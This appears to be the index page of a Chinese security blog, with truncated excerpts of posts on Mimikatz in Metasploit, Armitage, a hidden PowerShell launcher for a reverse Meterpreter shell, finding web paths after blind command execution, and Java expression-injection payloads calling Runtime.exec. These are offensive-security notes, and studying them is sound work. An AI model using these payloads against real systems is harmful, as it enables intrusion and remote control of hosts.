MAC下使用brew安装PyQt4、Qsci(Python2.7) For 剑鞘

RedFree | Linux, 默认分类 | 2016-06-21
MAC下使用brew安装PyQt4、Qsci(Python2.7) For 剑鞘
brew安装安装(需要 Ruby):ruby -e "$(curl -fsSL https://raw.github.com/Homebrew/homebrew/go/install)"搜索:brew search mysql查询:brew info mysql 主要看具体的信息,比如目前的版本,依赖,安装后注意事项等更新:brew update 这会更新 Homebrew 自己,并且使得接下来的两个操作有意义——检查过时(是否... [阅读全文]
ė176 次访问 6没有评论 0, , ,

Metasploit中的Mimikatz

RedFree | Metasploit | 2016-06-15
Metasploit中的Mimikatz
Mimikatz is a great post-exploitation tool written by Benjamin Delpy (gentilkiwi). A lot of times after the initial exploitation phase attackers may want to get a firmer foothold on the computer/network. Doing so often requires a set of complementary tools. Mimikatz is an attempt to bundle together some of the most useful tas... [阅读全文]

导入Github上的Armitage项目到本地的Eclipse

RedFree | CobaltStrike, JAVA, Metasploit | 2016-06-13
导入Github上的Armitage项目到本地的Eclipse
一、首先要为Eclipse安装WindowBuilder插件WindowBuilder下载地址:http://www.eclipse.org/windowbuilder/安装可以参考:http://jingyan.baidu.com/article/358570f67d88b2ce4724fcf5.html二、新建一个项目三、建立Armitage项目从Github上打包或克隆Armitage的源码[https://github.com/rsmudge/armitage],将其中的lib、resources、scripts、scripts-c... [阅读全文]
ė195 次访问 6没有评论 0,

使用Powershell反弹Meterpreter Shell

RedFree | Metasploit | 2016-06-13
使用Powershell反弹Meterpreter Shell
有时遇到有命令执行的点,却看不到命令执行的结果,使用Powershell可以轻易反弹回一个Meterpreter Shell。我从Veil中提取了生成Powershell reverse_tcp Payload的代码:生成的Payload是一个bat文件:@echo off if %PROCESSOR_ARCHITECTURE%==x86 (powershell.exe -NoP -NonI -W Hidden -Exec Bypass&nbs... [阅读全文]
ė106 次访问 6没有评论 0,

在debian系统的vps上搭建shadowsocks-libev

RedFree | Linux | 2016-06-13
什么是shadowsocksshadowsocks 是一个轻量级隧道代理,用来穿过防火墙。目前服务端主流的是shadowsocks-nodejsshadowsocks-libevshadowsocks-Pythonshadowsocks-go但是在小内存的vps还是要尽量节省内存,所以推荐shadowsocks-libev。shadowsocks-libev有如下特点:其一:版本更新及时,新功能支持的较多。比如目前最新的1.4.1版就支持UDP、多端口... [阅读全文]
ė89 次访问 6没有评论 0

Windows隐式命令执行查找Web目录的技巧

RedFree | C#, Metasploit, Windows | 2016-06-13
Windows隐式命令执行查找Web目录的技巧
撸站时难免会遇到一些比较特殊的情况,遇到一个可以执行命令的点(Windows,可连外网),却无法获得回显;这种情况下我通常会用这几种方法去尝试: 1、使用CloudEye获取命令执行的结果 2、找Web路径写WebShell 3、下载一个MSF的Payload直接反弹 某些情况下目标直接对公网开放3389,直接加个账户用完再删... 先说第一种方法,使用... [阅读全文]
ė99 次访问 6没有评论 0,

表达式注入的几类Payload

RedFree | JAVA | 2016-06-12
验证:${6196753-3562104}若页面中包含2634649,再验证其它数字相减页面中是否包含计算的结果,若有则表明其存在表达式注入。不同类型的Payload:实际上在利用表达式注入这类漏洞的时候有这么几类Payload去执行命令:1、${\u0027\u007e\u007e\u0027+\u0027\u0032\u0027+@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(\... [阅读全文]
ė388 次访问 6没有评论 0
Ɣ回顶部